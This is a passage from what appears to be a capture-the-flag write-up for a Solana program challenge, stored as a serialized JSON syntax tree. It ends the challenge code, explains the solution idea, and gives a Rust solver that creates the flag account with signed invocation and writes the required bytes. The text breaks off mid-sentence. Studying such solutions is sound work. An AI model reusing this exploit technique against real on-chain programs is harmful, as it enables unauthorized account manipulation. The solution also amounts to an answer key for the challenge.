"type":28,"tag":116,"props":42359,"children":42360},{"style":370},[42361],{"type":33,"value":141},{"type":28,"tag":116,"props":42363,"children":42364},{"style":260},[42365],{"type":33,"value":1091},{"type":28,"tag":116,"props":42367,"children":42368},{"style":370},[42369],{"type":33,"value":2825},{"type":28,"tag":116,"props":42371,"children":42372},{"style":266},[42373],{"type":33,"value":1291},{"type":28,"tag":116,"props":42375,"children":42376},{"class":245,"line":293},[42377,42381,42386,42390,42394,42398,42402,42406,42410],{"type":28,"tag":116,"props":42378,"children":42379},{"style":260},[42380],{"type":33,"value":11947},{"type":28,"tag":116,"props":42382,"children":42383},{"style":272},[42384],{"type":33,"value":42385}," acct",{"type":28,"tag":116,"props":42387,"children":42388},{"style":370},[42389],{"type":33,"value":141},{"type":28,"tag":116,"props":42391,"children":42392},{"style":266},[42393],{"type":33,"value":3372},{"type":28,"tag":116,"props":42395,"children":42396},{"style":370},[42397],{"type":33,"value":141},{"type":28,"tag":116,"props":42399,"children":42400},{"style":282},[42401],{"type":33,"value":8807},{"type":28,"tag":116,"props":42403,"children":42404},{"style":266},[42405],{"type":33,"value":13709},{"type":28,"tag":116,"props":42407,"children":42408},{"style":370},[42409],{"type":33,"value":2340},{"type":28,"tag":116,"props":42411,"children":42412},{"style":350},[42413],{"type":33,"value":42414}," 0x1337\n",{"type":28,"tag":116,"props":42416,"children":42417},{"class":245,"line":361},[42418,42423,42427,42431,42436,42440,42444,42448,42453,42457,42461,42465,42469,42473,42477,42481,42485,42490,42494],{"type":28,"tag":116,"props":42419,"children":42420},{"style":370},[42421],{"type":33,"value":42422},"        &&",{"type":28,"tag":116,"props":42424,"children":42425},{"style":339},[42426],{"type":33,"value":5531},{"type":28,"tag":116,"props":42428,"children":42429},{"style":370},[42430],{"type":33,"value":3151},{"type":28,"tag":116,"props":42432,"children":42433},{"style":282},[42434],{"type":33,"value":42435},"from_le_bytes",{"type":28,"tag":116,"props":42437,"children":42438},{"style":266},[42439],{"type":33,"value":313},{"type":28,"tag":116,"props":42441,"children":42442},{"style":272},[42443],{"type":33,"value":42306},{"type":28,"tag":116,"props":42445,"children":42446},{"style":370},[42447],{"type":33,"value":141},{"type":28,"tag":116,"props":42449,"children":42450},{"style":266},[42451],{"type":33,"value":42452},"data[",{"type":28,"tag":116,"props":42454,"children":42455},{"style":370},[42456],{"type":33,"value":2723},{"type":28,"tag":116,"props":42458,"children":42459},{"style":350},[42460],{"type":33,"value":3745},{"type":28,"tag":116,"props":42462,"children":42463},{"style":266},[42464],{"type":33,"value":15074},{"type":28,"tag":116,"props":42466,"children":42467},{"style":370},[42468],{"type":33,"value":141},{"type":28,"tag":116,"props":42470,"children":42471},{"style":282},[42472],{"type":33,"value":25817},{"type":28,"tag":116,"props":42474,"children":42475},{"style":266},[42476],{"type":33,"value":13545},{"type":28,"tag":116,"props":42478,"children":42479},{"style":370},[42480],{"type":33,"value":141},{"type":28,"tag":116,"props":42482,"children":42483},{"style":282},[42484],{"type":33,"value":3336},{"type":28,"tag":116,"props":42486,"children":42487},{"style":266},[42488],{"type":33,"value":42489},"()) ",{"type":28,"tag":116,"props":42491,"children":42492},{"style":370},[42493],{"type":33,"value":2340},{"type":28,"tag":116,"props":42495,"children":42496},{"style":350},[42497],{"type":33,"value":42498}," 0x4337\n",{"type":28,"tag":116,"props":42500,"children":42501},{"class":245,"line":387},[42502],{"type":28,"tag":116,"props":42503,"children":42504},{"style":266},[42505],{"type":33,"value":28842},{"type":28,"tag":116,"props":42507,"children":42508},{"class":245,"line":400},[42509,42514,42518,42522,42526,42531,42535,42539],{"type":28,"tag":116,"props":42510,"children":42511},{"style":282},[42512],{"type":33,"value":42513},"        writeln!",{"type":28,"tag":116,"props":42515,"children":42516},{"style":266},[42517],{"type":33,"value":313},{"type":28,"tag":116,"props":42519,"children":42520},{"style":272},[42521],{"type":33,"value":41559},{"type":28,"tag":116,"props":42523,"children":42524},{"style":266},[42525],{"type":33,"value":825},{"type":28,"tag":116,"props":42527,"children":42528},{"style":563},[42529],{"type":33,"value":42530},"\"congrats!\"",{"type":28,"tag":116,"props":42532,"children":42533},{"style":266},[42534],{"type":33,"value":1829},{"type":28,"tag":116,"props":42536,"children":42537},{"style":370},[42538],{"type":33,"value":2825},{"type":28,"tag":116,"props":42540,"children":42541},{"style":266},[42542],{"type":33,"value":384},{"type":28,"tag":116,"props":42544,"children":42545},{"class":245,"line":614},[42546,42550,42554,42559,42563,42567,42571,42575,42580,42584,42588,42592,42596],{"type":28,"tag":116,"props":42547,"children":42548},{"style":260},[42549],{"type":33,"value":2943},{"type":28,"tag":116,"props":42551,"children":42552},{"style":376},[42553],{"type":33,"value":26960},{"type":28,"tag":116,"props":42555,"children":42556},{"style":339},[42557],{"type":33,"value":42558}," Ok",{"type":28,"tag":116,"props":42560,"children":42561},{"style":266},[42562],{"type":33,"value":313},{"type":28,"tag":116,"props":42564,"children":42565},{"style":272},[42566],{"type":33,"value":42353},{"type":28,"tag":116,"props":42568,"children":42569},{"style":266},[42570],{"type":33,"value":1609},{"type":28,"tag":116,"props":42572,"children":42573},{"style":370},[42574],{"type":33,"value":373},{"type":28,"tag":116,"props":42576,"children":42577},{"style":266},[42578],{"type":33,"value":42579}," env",{"type":28,"tag":116,"props":42581,"children":42582},{"style":370},[42583],{"type":33,"value":3151},{"type":28,"tag":116,"props":42585,"children":42586},{"style":282},[42587],{"type":33,"value":34674},{"type":28,"tag":116,"props":42589,"children":42590},{"style":266},[42591],{"type":33,"value":313},{"type":28,"tag":116,"props":42593,"children":42594},{"style":563},[42595],{"type":33,"value":42244},{"type":28,"tag":116,"props":42597,"children":42598},{"style":266},[42599],{"type":33,"value":844},{"type":28,"tag":116,"props":42601,"children":42602},{"class":245,"line":631},[42603,42608,42612,42616,42620,42625,42629,42633,42637,42641],{"type":28,"tag":116,"props":42604,"children":42605},{"style":282},[42606],{"type":33,"value":42607},"            writeln!",{"type":28,"tag":116,"props":42609,"children":42610},{"style":266},[42611],{"type":33,"value":313},{"type":28,"tag":116,"props":42613,"children":42614},{"style":272},[42615],{"type":33,"value":41559},{"type":28,"tag":116,"props":42617,"children":42618},{"style":266},[42619],{"type":33,"value":825},{"type":28,"tag":116,"props":42621,"children":42622},{"style":563},[42623],{"type":33,"value":42624},"\"flag: {:?}\"",{"type":28,"tag":116,"props":42626,"children":42627},{"style":266},[42628],{"type":33,"value":825},{"type":28,"tag":116,"props":42630,"children":42631},{"style":272},[42632],{"type":33,"value":42353},{"type":28,"tag":116,"props":42634,"children":42635},{"style":266},[42636],{"type":33,"value":1829},{"type":28,"tag":116,"props":42638,"children":42639},{"style":370},[42640],{"type":33,"value":2825},{"type":28,"tag":116,"props":42642,"children":42643},{"style":266},[42644],{"type":33,"value":384},{"type":28,"tag":116,"props":42646,"children":42647},{"class":245,"line":665},[42648,42652,42656],{"type":28,"tag":116,"props":42649,"children":42650},{"style":266},[42651],{"type":33,"value":2981},{"type":28,"tag":116,"props":42653,"children":42654},{"style":260},[42655],{"type":33,"value":2986},{"type":28,"tag":116,"props":42657,"children":42658},{"style":266},[42659],{"type":33,"value":1291},{"type":28,"tag":116,"props":42661,"children":42662},{"class":245,"line":713},[42663,42667,42671,42675,42679,42684,42688,42692],{"type":28,"tag":116,"props":42664,"children":42665},{"style":282},[42666],{"type":33,"value":42607},{"type":28,"tag":116,"props":42668,"children":42669},{"style":266},[42670],{"type":33,"value":313},{"type":28,"tag":116,"props":42672,"children":42673},{"style":272},[42674],{"type":33,"value":41559},{"type":28,"tag":116,"props":42676,"children":42677},{"style":266},[42678],{"type":33,"value":825},{"type":28,"tag":116,"props":42680,"children":42681},{"style":563},[42682],{"type":33,"value":42683},"\"flag not found, please contact admin\"",{"type":28,"tag":116,"props":42685,"children":42686},{"style":266},[42687],{"type":33,"value":1829},{"type":28,"tag":116,"props":42689,"children":42690},{"style":370},[42691],{"type":33,"value":2825},{"type":28,"tag":116,"props":42693,"children":42694},{"style":266},[42695],{"type":33,"value":384},{"type":28,"tag":116,"props":42697,"children":42698},{"class":245,"line":750},[42699],{"type":28,"tag":116,"props":42700,"children":42701},{"style":266},[42702],{"type":33,"value":1954},{"type":28,"tag":116,"props":42704,"children":42705},{"class":245,"line":779},[42706],{"type":28,"tag":116,"props":42707,"children":42708},{"style":266},[42709],{"type":33,"value":3025},{"type":28,"tag":116,"props":42711,"children":42712},{"class":245,"line":796},[42713],{"type":28,"tag":116,"props":42714,"children":42715},{"style":266},[42716],{"type":33,"value":406},{"type":28,"tag":63,"props":42718,"children":42720},{"id":42719},"solution-idea",[42721],{"type":33,"value":42722},"Solution Idea",{"type":28,"tag":29,"props":42724,"children":42725},{},[42726,42728,42733],{"type":33,"value":42727},"You may think it's impossible to do with just one instruction, but we can actually leverage the ",{"type":28,"tag":98,"props":42729,"children":42731},{"className":42730},[],[42732],{"type":33,"value":35307},{"type":33,"value":42734}," function to execute infinite instructions. Well -- not entirely infinite, as we are limited by the amount of data we can pass to the on-chain program, and by the maximum stack depth of the Solana VM -- but we can execute up to 64 instructions, which is more than enough to get the flag.",{"type":28,"tag":29,"props":42736,"children":42737},{},[42738,42740,42746],{"type":33,"value":42739},"In order to get the flag, we need to make sure that the account at ",{"type":28,"tag":98,"props":42741,"children":42743},{"className":42742},[],[42744],{"type":33,"value":42745},"PDA(\"FLAG\")",{"type":33,"value":42747}," exists, has a data length of 0x1337, and the first 8 bytes are equal to 0x4337.",{"type":28,"tag":29,"props":42749,"children":42750},{},[42751,42753,42760],{"type":33,"value":42752},"Essentially, we need to ",{"type":28,"tag":87,"props":42754,"children":42757},{"href":42755,"rel":42756},"https://docs.solana.com/developing/runtime-facilities/programs#system-program",[91],[42758],{"type":33,"value":42759},"invoke the System Program",{"type":33,"value":42761},", and write controlled data into the newly created account.",{"type":28,"tag":29,"props":42763,"children":42764},{},[42765],{"type":33,"value":42766},"A sample program that does this is as follows:",{"type":28,"tag":234,"props":42768,"children":42770},{"className":2652,"code":42769,"language":2651,"meta":7,"style":7},"pub fn process_instruction(\n    program_id: &Pubkey,\n    accounts: &[AccountInfo],\n    data: &[u8]\n) -> ProgramResult {\n    let flag_pda_ai = &accounts[0];\n    let user_ai = &accounts[1];\n\n    // Step 1: Create a new account with 0x1337 bytes of data\n    let instruction = Instruction::new_with_bincode(\n        system_program::ID,\n        &SystemInstruction::CreateAccount {\n            space: 0x1337,\n            lamports: Rent::default().minimum_balance(0x1337),\n            owner: chall::ID\n        },\n        vec![\n            AccountMeta::new(*user_ai.key, true),\n            AccountMeta::new(*flag_pda_ai.key, true),\n        ],\n    );\n    invoke_signed_unchecked(\n        &instruction,\n        &[\n            user_ai.clone(),\n            flag_pda_ai.clone(),\n        ],\n        &[&[\"FLAG\".as_ref()]],\n    )?;\n\n    // Step 2: Write 0x4337 to the first 8 bytes of the account\n    flag_pda_ai.try_borrow_mut_data()?[..8].copy_from_slice(&0x4337u64.to_le_bytes());\n\n    Ok(())\n}\n",[42771],{"type":28,"tag":98,"props":42772,"children":42773},{"__ignoreMap":7},[42774,42794,42818,42846,42874,42894,42930,42966,42973,42981,43014,43031,43056,43077,43129,43154,43161,43174,43220,43264,43272,43280,43291,43307,43318,43338,43358,43365,43401,43416,43423,43431,43510,43517,43528],{"type":28,"tag":116,"props":42775,"children":42776},{"class":245,"line":246},[42777,42781,42785,42790],{"type":28,"tag":116,"props":42778,"children":42779},{"style":376},[42780],{"type":33,"value":13356},{"type":28,"tag":116,"props":42782,"children":42783},{"style":376},[42784],{"type":33,"value":13361},{"type":28,"tag":116,"props":42786,"children":42787},{"style":282},[42788],{"type":33,"value":42789}," process_instruction",{"type":28,"tag":116,"props":42791,"children":42792},{"style":266},[42793],{"type":33,"value":3133},{"type":28,"tag":116,"props":42795,"children":42796},{"class":245,"line":256},[42797,42802,42806,42810,42814],{"type":28,"tag":116,"props":42798,"children":42799},{"style":272},[42800],{"type":33,"value":42801},"    program_id",{"type":28,"tag":116,"props":42803,"children":42804},{"style":370},[42805],{"type":33,"value":4160},{"type":28,"tag":116,"props":42807,"children":42808},{"style":370},[42809],{"type":33,"value":6813},{"type":28,"tag":116,"props":42811,"children":42812},{"style":339},[42813],{"type":33,"value":21061},{"type":28,"tag":116,"props":42815,"children":42816},{"style":266},[42817],{"type":33,"value":3178},{"type":28,"tag":116,"props":42819,"children":42820},{"class":245,"line":293},[42821,42826,42830,42834,42838,42842],{"type":28,"tag":116,"props":42822,"children":42823},{"style":272},[42824],{"type":33,"value":42825},"    accounts",{"type":28,"tag":116,"props":42827,"children":42828},{"style":370},[42829],{"type":33,"value":4160},{"type":28,"tag":116,"props":42831,"children":42832},{"style":370},[42833],{"type":33,"value":6813},{"type":28,"tag":116,"props":42835,"children":42836},{"style":266},[42837],{"type":33,"value":347},{"type":28,"tag":116,"props":42839,"children":42840},{"style":339},[42841],{"type":33,"value":14602},{"type":28,"tag":116,"props":42843,"children":42844},{"style":266},[42845],{"type":33,"value":13929},{"type":28,"tag":116,"props":42847,"children":42848},{"class":245,"line":361},[42849,42854,42858,42862,42866,42870],{"type":28,"tag":116,"props":42850,"children":42851},{"style":272},[42852],{"type":33,"value":42853},"    data",{"type":28,"tag":116,"props":42855,"children":42856},{"style":370},[42857],{"type":33,"value":4160},{"type":28,"tag":116,"props":42859,"children":42860},{"style":370},[42861],{"type":33,"value":6813},{"type":28,"tag":116,"props":42863,"children":42864},{"style":266},[42865],{"type":33,"value":347},{"type":28,"tag":116,"props":42867,"children":42868},{"style":339},[42869],{"type":33,"value":3091},{"type":28,"tag":116,"props":42871,"children":42872},{"style":266},[42873],{"type":33,"value":11440},{"type":28,"tag":116,"props":42875,"children":42876},{"class":245,"line":387},[42877,42881,42885,42890],{"type":28,"tag":116,"props":42878,"children":42879},{"style":266},[42880],{"type":33,"value":1609},{"type":28,"tag":116,"props":42882,"children":42883},{"style":370},[42884],{"type":33,"value":13423},{"type":28,"tag":116,"props":42886,"children":42887},{"style":339},[42888],{"type":33,"value":42889}," ProgramResult",{"type":28,"tag":116,"props":42891,"children":42892},{"style":266},[42893],{"type":33,"value":1291},{"type":28,"tag":116,"props":42895,"children":42896},{"class":245,"line":400},[42897,42901,42906,42910,42914,42918,42922,42926],{"type":28,"tag":116,"props":42898,"children":42899},{"style":376},[42900],{"type":33,"value":2672},{"type":28,"tag":116,"props":42902,"children":42903},{"style":272},[42904],{"type":33,"value":42905}," flag_pda_ai",{"type":28,"tag":116,"props":42907,"children":42908},{"style":370},[42909],{"type":33,"value":2226},{"type":28,"tag":116,"props":42911,"children":42912},{"style":370},[42913],{"type":33,"value":6813},{"type":28,"tag":116,"props":42915,"children":42916},{"style":272},[42917],{"type":33,"value":14341},{"type":28,"tag":116,"props":42919,"children":42920},{"style":266},[42921],{"type":33,"value":347},{"type":28,"tag":116,"props":42923,"children":42924},{"style":350},[42925],{"type":33,"value":353},{"type":28,"tag":116,"props":42927,"children":42928},{"style":266},[42929],{"type":33,"value":31223},{"type":28,"tag":116,"props":42931,"children":42932},{"class":245,"line":614},[42933,42937,42942,42946,42950,42954,42958,42962],{"type":28,"tag":116,"props":42934,"children":42935},{"style":376},[42936],{"type":33,"value":2672},{"type":28,"tag":116,"props":42938,"children":42939},{"style":272},[42940],{"type":33,"value":42941}," user_ai",{"type":28,"tag":116,"props":42943,"children":42944},{"style":370},[42945],{"type":33,"value":2226},{"type":28,"tag":116,"props":42947,"children":42948},{"style":370},[42949],{"type":33,"value":6813},{"type":28,"tag":116,"props":42951,"children":42952},{"style":272},[42953],{"type":33,"value":14341},{"type":28,"tag":116,"props":42955,"children":42956},{"style":266},[42957],{"type":33,"value":347},{"type":28,"tag":116,"props":42959,"children":42960},{"style":350},[42961],{"type":33,"value":1824},{"type":28,"tag":116,"props":42963,"children":42964},{"style":266},[42965],{"type":33,"value":31223},{"type":28,"tag":116,"props":42967,"children":42968},{"class":245,"line":631},[42969],{"type":28,"tag":116,"props":42970,"children":42971},{"emptyLinePlaceholder":19},[42972],{"type":33,"value":1044},{"type":28,"tag":116,"props":42974,"children":42975},{"class":245,"line":665},[42976],{"type":28,"tag":116,"props":42977,"children":42978},{"style":250},[42979],{"type":33,"value":42980},"    // Step 1: Create a new account with 0x1337 bytes of data\n",{"type":28,"tag":116,"props":42982,"children":42983},{"class":245,"line":713},[42984,42988,42993,42997,43001,43005,43010],{"type":28,"tag":116,"props":42985,"children":42986},{"style":376},[42987],{"type":33,"value":2672},{"type":28,"tag":116,"props":42989,"children":42990},{"style":272},[42991],{"type":33,"value":42992}," instruction",{"type":28,"tag":116,"props":42994,"children":42995},{"style":370},[42996],{"type":33,"value":2226},{"type":28,"tag":116,"props":42998,"children":42999},{"style":339},[43000],{"type":33,"value":40632},{"type":28,"tag":116,"props":43002,"children":43003},{"style":370},[43004],{"type":33,"value":3151},{"type":28,"tag":116,"props":43006,"children":43007},{"style":282},[43008],{"type":33,"value":43009},"new_with_bincode",{"type":28,"tag":116,"props":43011,"children":43012},{"style":266},[43013],{"type":33,"value":3133},{"type":28,"tag":116,"props":43015,"children":43016},{"class":245,"line":750},[43017,43022,43026],{"type":28,"tag":116,"props":43018,"children":43019},{"style":266},[43020],{"type":33,"value":43021},"        system_program",{"type":28,"tag":116,"props":43023,"children":43024},{"style":370},[43025],{"type":33,"value":3151},{"type":28,"tag":116,"props":43027,"children":43028},{"style":266},[43029],{"type":33,"value":43030},"ID,\n",{"type":28,"tag":116,"props":43032,"children":43033},{"class":245,"line":779},[43034,43038,43043,43047,43052],{"type":28,"tag":116,"props":43035,"children":43036},{"style":370},[43037],{"type":33,"value":3141},{"type":28,"tag":116,"props":43039,"children":43040},{"style":266},[43041],{"type":33,"value":43042},"SystemInstruction",{"type":28,"tag":116,"props":43044,"children":43045},{"style":370},[43046],{"type":33,"value":3151},{"type":28,"tag":116,"props":43048,"children":43049},{"style":339},[43050],{"type":33,"value":43051},"CreateAccount",{"type":28,"tag":116,"props":43053,"children":43054},{"style":266},[43055],{"type":33,"value":1291},{"type":28,"tag":116,"props":43057,"children":43058},{"class":245,"line":796},[43059,43064,43068,43073],{"type":28,"tag":116,"props":43060,"children":43061},{"style":272},[43062],{"type":33,"value":43063},"            space",{"type":28,"tag":116,"props":43065,"children":43066},{"style":370},[43067],{"type":33,"value":4160},{"type":28,"tag":116,"props":43069,"children":43070},{"style":350},[43071],{"type":33,"value":43072}," 0x1337",{"type":28,"tag":116,"props":43074,"children":43075},{"style":266},[43076],{"type":33,"value":3178},{"type":28,"tag":116,"props":43078,"children":43079},{"class":245,"line":847},[43080,43085,43089,43094,43098,43103,43107,43111,43116,43120,43125],{"type":28,"tag":116,"props":43081,"children":43082},{"style":272},[43083],{"type":33,"value":43084},"            lamports",{"type":28,"tag":116,"props":43086,"children":43087},{"style":370},[43088],{"type":33,"value":4160},{"type":28,"tag":116,"props":43090,"children":43091},{"style":266},[43092],{"type":33,"value":43093}," Rent",{"type":28,"tag":116,"props":43095,"children":43096},{"style":370},[43097],{"type":33,"value":3151},{"type":28,"tag":116,"props":43099,"children":43100},{"style":282},[43101],{"type":33,"value":43102},"default",{"type":28,"tag":116,"props":43104,"children":43105},{"style":266},[43106],{"type":33,"value":13545},{"type":28,"tag":116,"props":43108,"children":43109},{"style":370},[43110],{"type":33,"value":141},{"type":28,"tag":116,"props":43112,"children":43113},{"style":282},[43114],{"type":33,"value":43115},"minimum_balance",{"type":28,"tag":116,"props":43117,"children":43118},{"style":266},[43119],{"type":33,"value":313},{"type":28,"tag":116,"props":43121,"children":43122},{"style":350},[43123],{"type":33,"value":43124},"0x1337",{"type":28,"tag":116,"props":43126,"children":43127},{"style":266},[43128],{"type":33,"value":6408},{"type":28,"tag":116,"props":43130,"children":43131},{"class":245,"line":898},[43132,43137,43141,43145,43149],{"type":28,"tag":116,"props":43133,"children":43134},{"style":272},[43135],{"type":33,"value":43136},"            owner",{"type":28,"tag":116,"props":43138,"children":43139},{"style":370},[43140],{"type":33,"value":4160},{"type":28,"tag":116,"props":43142,"children":43143},{"style":266},[43144],{"type":33,"value":41664},{"type":28,"tag":116,"props":43146,"children":43147},{"style":370},[43148],{"type":33,"value":3151},{"type":28,"tag":116,"props":43150,"children":43151},{"style":266},[43152],{"type":33,"value":43153},"ID\n",{"type":28,"tag":116,"props":43155,"children":43156},{"class":245,"line":907},[43157],{"type":28,"tag":116,"props":43158,"children":43159},{"style":266},[43160],{"type":33,"value":25028},{"type":28,"tag":116,"props":43162,"children":43163},{"class":245,"line":981},[43164,43169],{"type":28,"tag":116,"props":43165,"children":43166},{"style":282},[43167],{"type":33,"value":43168},"        vec!",{"type":28,"tag":116,"props":43170,"children":43171},{"style":266},[43172],{"type":33,"value":43173},"[\n",{"type":28,"tag":116,"props":43175,"children":43176},{"class":245,"line":1011},[43177,43182,43186,43190,43194,43198,43203,43207,43212,43216],{"type":28,"tag":116,"props":43178,"children":43179},{"style":266},[43180],{"type":33,"value":43181},"            AccountMeta",{"type":28,"tag":116,"props":43183,"children":43184},{"style":370},[43185],{"type":33,"value":3151},{"type":28,"tag":116,"props":43187,"children":43188},{"style":282},[43189],{"type":33,"value":336},{"type":28,"tag":116,"props":43191,"children":43192},{"style":266},[43193],{"type":33,"value":313},{"type":28,"tag":116,"props":43195,"children":43196},{"style":370},[43197],{"type":33,"value":4240},{"type":28,"tag":116,"props":43199,"children":43200},{"style":272},[43201],{"type":33,"value":43202},"user_ai",{"type":28,"tag":116,"props":43204,"children":43205},{"style":370},[43206],{"type":33,"value":141},{"type":28,"tag":116,"props":43208,"children":43209},{"style":266},[43210],{"type":33,"value":43211},"key, ",{"type":28,"tag":116,"props":43213,"children":43214},{"style":376},[43215],{"type":33,"value":3664},{"type":28,"tag":116,"props":43217,"children":43218},{"style":266},[43219],{"type":33,"value":6408},{"type":28,"tag":116,"props":43221,"children":43222},{"class":245,"line":1029},[43223,43227,43231,43235,43239,43243,43248,43252,43256,43260],{"type":28,"tag":116,"props":43224,"children":43225},{"style":266},[43226],{"type":33,"value":43181},{"type":28,"tag":116,"props":43228,"children":43229},{"style":370},[43230],{"type":33,"value":3151},{"type":28,"tag":116,"props":43232,"children":43233},{"style":282},[43234],{"type":33,"value":336},{"type":28,"tag":116,"props":43236,"children":43237},{"style":266},[43238],{"type":33,"value":313},{"type":28,"tag":116,"props":43240,"children":43241},{"style":370},[43242],{"type":33,"value":4240},{"type":28,"tag":116,"props":43244,"children":43245},{"style":272},[43246],{"type":33,"value":43247},"flag_pda_ai",{"type":28,"tag":116,"props":43249,"children":43250},{"style":370},[43251],{"type":33,"value":141},{"type":28,"tag":116,"props":43253,"children":43254},{"style":266},[43255],{"type":33,"value":43211},{"type":28,"tag":116,"props":43257,"children":43258},{"style":376},[43259],{"type":33,"value":3664},{"type":28,"tag":116,"props":43261,"children":43262},{"style":266},[43263],{"type":33,"value":6408},{"type":28,"tag":116,"props":43265,"children":43266},{"class":245,"line":1038},[43267],{"type":28,"tag":116,"props":43268,"children":43269},{"style":266},[43270],{"type":33,"value":43271},"        ],\n",{"type":28,"tag":116,"props":43273,"children":43274},{"class":245,"line":1047},[43275],{"type":28,"tag":116,"props":43276,"children":43277},{"style":266},[43278],{"type":33,"value":43279},"    );\n",{"type":28,"tag":116,"props":43281,"children":43282},{"class":245,"line":1071},[43283,43287],{"type":28,"tag":116,"props":43284,"children":43285},{"style":282},[43286],{"type":33,"value":40749},{"type":28,"tag":116,"props":43288,"children":43289},{"style":266},[43290],{"type":33,"value":3133},{"type":28,"tag":116,"props":43292,"children":43293},{"class":245,"line":1137},[43294,43298,43303],{"type":28,"tag":116,"props":43295,"children":43296},{"style":370},[43297],{"type":33,"value":3141},{"type":28,"tag":116,"props":43299,"children":43300},{"style":272},[43301],{"type":33,"value":43302},"instruction",{"type":28,"tag":116,"props":43304,"children":43305},{"style":266},[43306],{"type":33,"value":3178},{"type":28,"tag":116,"props":43308,"children":43309},{"class":245,"line":1181},[43310,43314],{"type":28,"tag":116,"props":43311,"children":43312},{"style":370},[43313],{"type":33,"value":3141},{"type":28,"tag":116,"props":43315,"children":43316},{"style":266},[43317],{"type":33,"value":43173},{"type":28,"tag":116,"props":43319,"children":43320},{"class":245,"line":1212},[43321,43326,43330,43334],{"type":28,"tag":116,"props":43322,"children":43323},{"style":272},[43324],{"type":33,"value":43325},"            user_ai",{"type":28,"tag":116,"props":43327,"children":43328},{"style":370},[43329],{"type":33,"value":141},{"type":28,"tag":116,"props":43331,"children":43332},{"style":282},[43333],{"type":33,"value":15083},{"type":28,"tag":116,"props":43335,"children":43336},{"style":266},[43337],{"type":33,"value":3161},{"type":28,"tag":116,"props":43339,"children":43340},{"class":245,"line":1254},[43341,43346,43350,43354],{"type":28,"tag":116,"props":43342,"children":43343},{"style":272},[43344],{"type":33,"value":43345},"            flag_pda_ai",{"type":28,"tag":116,"props":43347,"children":43348},{"style":370},[43349],{"type":33,"value":141},{"type":28,"tag":116,"props":43351,"children":43352},{"style":282},[43353],{"type":33,"value":15083},{"type":28,"tag":116,"props":43355,"children":43356},{"style":266},[43357],{"type":33,"value":3161},{"type":28,"tag":116,"props":43359,"children":43360},{"class":245,"line":1262},[43361],{"type":28,"tag":116,"props":43362,"children":43363},{"style":266},[43364],{"type":33,"value":43271},{"type":28,"tag":116,"props":43366,"children":43367},{"class":245,"line":1294},[43368,43372,43376,43380,43384,43388,43392,43396],{"type":28,"tag":116,"props":43369,"children":43370},{"style":370},[43371],{"type":33,"value":3141},{"type":28,"tag":116,"props":43373,"children":43374},{"style":266},[43375],{"type":33,"value":347},{"type":28,"tag":116,"props":43377,"children":43378},{"style":370},[43379],{"type":33,"value":2780},{"type":28,"tag":116,"props":43381,"children":43382},{"style":266},[43383],{"type":33,"value":347},{"type":28,"tag":116,"props":43385,"children":43386},{"style":563},[43387],{"type":33,"value":42244},{"type":28,"tag":116,"props":43389,"children":43390},{"style":370},[43391],{"type":33,"value":141},{"type":28,"tag":116,"props":43393,"children":43394},{"style":282},[43395],{"type":33,"value":42253},{"type":28,"tag":116,"props":43397,"children":43398},{"style":266},[43399],{"type":33,"value":43400},"()]],\n",{"type":28,"tag":116,"props":43402,"children":43403},{"class":245,"line":1334},[43404,43408,43412],{"type":28,"tag":116,"props":43405,"children":43406},{"style":266},[43407],{"type":33,"value":3327},{"type":28,"tag":116,"props":43409,"children":43410},{"style":370},[43411],{"type":33,"value":2825},{"type":28,"tag":116,"props":43413,"children":43414},{"style":266},[43415],{"type":33,"value":384},{"type":28,"tag":116,"props":43417,"children":43418},{"class":245,"line":1372},[43419],{"type":28,"tag":116,"props":43420,"children":43421},{"emptyLinePlaceholder":19},[43422],{"type":33,"value":1044},{"type":28,"tag":116,"props":43424,"children":43425},{"class":245,"line":1381},[43426],{"type":28,"tag":116,"props":43427,"children":43428},{"style":250},[43429],{"type":33,"value":43430},"    // Step 2: Write 0x4337 to the first 8 bytes of the account\n",{"type":28,"tag":116,"props":43432,"children":43433},{"class":245,"line":1389},[43434,43439,43443,43447,43451,43455,43459,43463,43467,43471,43475,43480,43484,43488,43493,43497,43501,43506],{"type":28,"tag":116,"props":43435,"children":43436},{"style":272},[43437],{"type":33,"value":43438},"    flag_pda_ai",{"type":28,"tag":116,"props":43440,"children":43441},{"style":370},[43442],{"type":33,"value":141},{"type":28,"tag":116,"props":43444,"children":43445},{"style":282},[43446],{"type":33,"value":13540},{"type":28,"tag":116,"props":43448,"children":43449},{"style":266},[43450],{"type":33,"value":13545},{"type":28,"tag":116,"props":43452,"children":43453},{"style":370},[43454],{"type":33,"value":2825},{"type":28,"tag":116,"props":43456,"children":43457},{"style":266},[43458],{"type":33,"value":347},{"type":28,"tag":116,"props":43460,"children":43461},{"style":370},[43462],{"type":33,"value":2723},{"type":28,"tag":116,"props":43464,"children":43465},{"style":350},[43466],{"type":33,"value":3745},{"type":28,"tag":116,"props":43468,"children":43469},{"style":266},[43470],{"type":33,"value":15074},{"type":28,"tag":116,"props":43472,"children":43473},{"style":370},[43474],{"type":33,"value":141},{"type":28,"tag":116,"props":43476,"children":43477},{"style":282},[43478],{"type":33,"value":43479},"copy_from_slice",{"type":28,"tag":116,"props":43481,"children":43482},{"style":266},[43483],{"type":33,"value":313},{"type":28,"tag":116,"props":43485,"children":43486},{"style":370},[43487],{"type":33,"value":2780},{"type":28,"tag":116,"props":43489,"children":43490},{"style":350},[43491],{"type":33,"value":43492},"0x4337",{"type":28,"tag":116,"props":43494,"children":43495},{"style":339},[43496],{"type":33,"value":7714},{"type":28,"tag":116,"props":43498,"children":43499},{"style":370},[43500],{"type":33,"value":141},{"type":28,"tag":116,"props":43502,"children":43503},{"style":282},[43504],{"type":33,"value":43505},"to_le_bytes",{"type":28,"tag":116,"props":43507,"children":43508},{"style":266},[43509],{"type":33,"value":1577},{"type":28,"tag":116,"props":43511,"children":43512},{"class":245,"line":1425},[43513],{"type":28,"tag":116,"props":43514,"children":43515},{"emptyLinePlaceholder":19},[43516],{"type":33,"value":1044},{"type":28,"tag":116,"props":43518,"children":43519},{"class":245,"line":1448},[43520,43524],{"type":28,"tag":116,"props":43521,"children":43522},{"style":339},[43523],{"type":33,"value":13999},{"type":28,"tag":116,"props":43525,"children":43526},{"style":266},[43527],{"type":33,"value":14004},{"type":28,"tag":116,"props":43529,"children":43530},{"class":245,"line":1456},[43531],{"type":28,"tag":116,"props":43532,"children":43533},{"style":266},[43534],{"type":33,"value":406},{"type":28,"tag":29,"props":43536,"children":43537},{},[43538],{"type":33,"value":43539},"To test this theory, we can execute the program above inside the test environment, and see if we can get the 